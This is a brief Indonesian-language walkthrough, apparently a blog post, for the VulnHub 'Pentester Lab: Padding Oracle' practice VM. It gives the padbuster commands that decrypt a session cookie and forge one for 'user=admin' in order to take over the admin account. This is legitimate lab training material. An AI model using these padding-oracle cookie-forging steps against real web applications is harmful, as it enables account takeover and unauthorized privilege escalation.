download file iso server target di sini :
https://www.vulnhub.com/entry/pentester-lab-padding-oracle,174/
install file iso tersebut di virtualbox.
lihat ip adress dengan perintah ifconfig
buka browser untuk meengakses web padding oracle.
1. Login sebagai akun biasa
2. install padbuster di Kali linux : sudo apt install padbuster
3.padbuster http://192.168.42.136/index.php zAeUjhwXiBhssKRTtdAy7AOfaXM9Hx0O 8 --cookie auth=zAeUjhwXiBhssKRTtdAy7AOfaXM9Hx0O --encoding 0
4. masukkan angka 2 (rekomendasi dari pad buster)
Finished
Decrypt value ASCII = ......
Decrypt value HEX = .........
Decrypt value Base64 = ........
5. untuk mengganti akun kita dengan akun admin :
padbuster http://192.168.42.136/index.php zAeUjhwXiBhssKRTtdAy7AOfaXM9Hx0O 8 --cookie auth=zAeUjhwXiBhssKRTtdAy7AOfaXM9Hx0O --encoding 0 --plaintext user=admin
6. edit cookie akun kita dengan cookie akun admin yg kita peroleh dari pad buster
7. refresh browser, kita sudah bisa login dengan akun admin
Komentar